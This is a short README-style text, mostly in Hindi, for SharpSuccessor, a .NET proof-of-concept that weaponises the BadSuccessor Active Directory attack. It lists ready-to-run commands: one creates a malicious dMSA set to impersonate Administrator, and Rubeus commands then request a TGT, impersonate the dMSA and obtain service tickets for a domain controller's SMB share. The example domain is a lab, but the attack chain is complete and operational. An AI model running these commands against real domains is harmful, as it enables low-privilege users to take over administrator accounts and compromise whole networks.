
SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai.
SharpSuccessor, Akamai के Yuval Gordon (@YuG0rd) के BadSuccessor हमले को पूरी तरह से हथियारबंद करने के लिए एक .NET प्रूफ ऑफ कॉन्सेप्ट (POC) है। Active Directory डोमेन में किसी भी Organizational Unit (OU) पर CreateChild अनुमति और लक्ष्य ऑब्जेक्ट पर लेखन पहुंच रखने वाला एक कम-विशेषाधिकार वाला उपयोगकर्ता खाता अधिग्रहण (account takeover) कर सकता है।
SharpSuccessor का उपयोग dMSA ऑब्जेक्ट को जोड़ने और हथियारबंद करने के साथ-साथ उस लक्ष्य खाते पर सही विशेषताएँ लिखने के लिए करें जिसे आप impersonate करना चाहते हैं:
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

वर्तमान उपयोगकर्ता संदर्भ में TGT का अनुरोध करें, इस मामले में jdoe:
Rubeus.exe tgtdeleg /nowrap

फिर उस tgt का उपयोग करके dMSA खाते को impersonate करें:
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....

अब आप किसी भी SPN के लिए Administrator संदर्भ के साथ सर्विस टिकट का अनुरोध कर सकते हैं, जिसमें पोस्ट-एक्सप्लॉइटेशन के लिए Domain Controllers भी शामिल हैं। उदाहरण के लिए, यहाँ मैं डोमेन कंट्रोलर पर SMB के लिए व्यवस्थापक (admin) विशेषाधिकार दिखाऊँगा:
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...

अब जब टिकट मेमोरी में है, हम पहुंच का परीक्षण कर सकते हैं:

इस टूल के लिए प्रेरणा और सहायता देने हेतु Jim Sykora और Garrett Foster का हार्दिक धन्यवाद!